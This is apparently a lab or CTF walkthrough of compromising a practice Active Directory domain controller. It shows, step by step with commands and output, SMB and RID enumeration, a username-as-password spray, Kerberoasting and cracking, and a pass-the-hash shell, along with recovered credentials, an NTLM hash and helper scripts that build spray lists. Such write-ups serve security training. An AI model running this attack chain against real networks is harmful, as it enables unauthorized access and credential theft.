The target machine for this penetration test has the IP 192.168.56.130

Port scan

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 16:56 UTC
Nmap scan report for 192.168.56.130 (192.168.56.130)
Host is up (0.00031s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
49683/tcp open unknown
MAC Address: 08:00:27:57:B6:6B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds
┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 192.168.56.130
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 16:59 UTC
Nmap scan report for 192.168.56.130 (192.168.56.130)
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-14 07:59:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
MAC Address: 08:00:27:57:B6:6B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-07-14T07:59:24
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:57:b6:6b (Oracle VirtualBox virtual NIC)
|_clock-skew: 14h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.87 seconds

Add the domain name soupedecode.local to /etc/hosts

Lookupsid

Without any credentials, SMB enumeration is the only place to start.

┌──(mikannse㉿kali)-[~/桌面]
└─$ smbmap -H 192.168.56.130 -u anonymous

-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 192.168.56.130:445 Name: SOUPEDECODE.LOCAL0 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
backup NO ACCESS
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
Users NO ACCESS

There is one share, IPC$, that can be read, but it contains nothing.

┌──(mikannse㉿kali)-[~/桌面]
└─$ smbclient //192.168.56.130/IPC$
Password for [WORKGROUP\mikannse]:
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_NO_SUCH_FILE listing \*

Many other shares are visible above, but the anonymous identity has no permission on them.

Next, hunt for users; in practice this is just LDAP enumeration.

┌──(mikannse㉿kali)-[~/桌面]
└─$ lookupsid.py 'soupedecode.local/anonymous@192.168.56.130'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 192.168.56.130
[*] StringBinding ncacn_np:192.168.56.130[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
...

Save the results and extract the usernames into a wordlist.

# Parse the saved lookupsid.py output (user.txt) and write one username per line
with open('user.txt', 'r') as file1:
    lines = file1.read().splitlines()

with open('username.txt', 'w') as file2:
    for line in lines:
        # only the "RID: DOMAIN\name (SidType)" lines carry account names
        if 'SidType' not in line:
            continue
        fields = line.split()
        # fields[1] is 'SOUPEDECODE\name'; drop the 'SOUPEDECODE\' prefix (12 chars)
        username = fields[1][12:]
        file2.write(username + '\n')
print('Done')
┌──(mikannse㉿kali)-[~/桌面]
└─$ crackmapexec smb 192.168.56.130 -u username.txt -p username.txt --continue-on-success --no-bruteforce
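A more robust version of the extraction step above, added here as an example and not part of the original post: it parses lookupsid.py output with a regex (so names containing spaces, like the group on RID 498, are handled), keeps only SidTypeUser objects, and drops built-in RIDs and machine accounts before the username-as-password check. The sample output is constructed to mirror the writeup's results; ybob317's RID and the DC01$ entry are assumptions.

```python
# Added example (not from the original post): parse lookupsid.py output into a
# spray list of real user accounts, dropping groups, well-known RIDs and machines.
import re
from typing import List, NamedTuple

# Constructed sample mirroring the writeup's lookupsid output; ybob317's RID is assumed
SAMPLE_OUTPUT = """\
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 192.168.56.130
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\\Administrator (SidTypeUser)
501: SOUPEDECODE\\Guest (SidTypeUser)
502: SOUPEDECODE\\krbtgt (SidTypeUser)
512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
1000: SOUPEDECODE\\DC01$ (SidTypeUser)
1104: SOUPEDECODE\\ybob317 (SidTypeUser)
"""

class SidEntry(NamedTuple):
    rid: int
    domain: str
    name: str
    sid_type: str

# "<rid>: <DOMAIN>\<name> (<SidType>)"; the name part may itself contain spaces,
# which is why a fixed-offset slice on split() output is fragile
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+) \((SidType\w+)\)$")

def parse_lookupsid(text: str) -> List[SidEntry]:
    """Return every resolved SID line as a SidEntry; banner/status lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append(SidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries

def spray_candidates(entries: List[SidEntry], include_machines: bool = False,
                     min_rid: int = 1000) -> List[str]:
    """Usernames worth testing with username-as-password: user objects only,
    built-in RIDs below min_rid dropped, machine accounts ('$') dropped by default."""
    return [e.name for e in entries
            if e.sid_type == "SidTypeUser"
            and e.rid >= min_rid
            and (include_machines or not e.name.endswith("$"))]
```

Writing the returned list one name per line gives the same username.txt the crackmapexec command above consumes.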

This yields one valid set of credentials: ybob317:ybob317

The Users share is now accessible, and the first user flag is on ybob317's desktop.

Kerberoasting

Use GetUserSPNs

┌──(mikannse㉿kali)-[~/桌面]
└─$ GetUserSPNs.py -dc-ip 192.168.56.130 SOUPEDECODE.LOCAL/ybob317:ybob317 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- -------------- -------- -------------------------- --------- ----------
FTP/FileServer file_svc 2024-06-17 17:32:23.726085 <never>
FW/ProxyServer firewall_svc 2024-06-17 17:28:32.710125 <never>
HTTP/BackupServer backup_svc 2024-06-17 17:28:49.476511 <never>
HTTP/WebServer web_svc 2024-06-17 17:29:04.569417 <never>
HTTPS/MonitoringServer monitoring_svc 2024-06-17 17:29:18.511871 <never>



[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Kerberos authentication apparently fails because the clocks are out of sync; use rdate to synchronize Kali's clock with the target.

┌──(mikannse㉿kali)-[~/桌面]
└─$ sudo rdate -n 192.168.56.130
Sun Jul 14 20:29:16 UTC 2024
sudo GetUserSPNs.py -dc-ip 192.168.56.130 SOUPEDECODE.LOCAL/ybob317:ybob317 -request >hash
┌──(mikannse㉿kali)-[~/桌面]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash

Credentials obtained: file_svc:Password123!!

Pass-the-Hash

Connect to the backup share over SMB again; it yields a set of users along with their NTLM hashes.

Cracking them led nowhere, but the Users share seen earlier contained a FileServer$ account; passing its hash gives a shell.

┌──(mikannse㉿kali)-[~/桌面]
└─$ evil-winrm -i soupedecode.local -u 'FileServer$' -H 'e41da7e79a4c76dbd9cf79d1cb325559'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FileServer$\Documents>

The flag is on admin's desktop.

Closing thoughts

It has been a long time since I last attacked a DC, and I still learned a lot. This room revolves around credential harvesting and interacting with SMB shares, and it is an excellent room for practicing credential collection. I also learned the new "lookupsid" technique.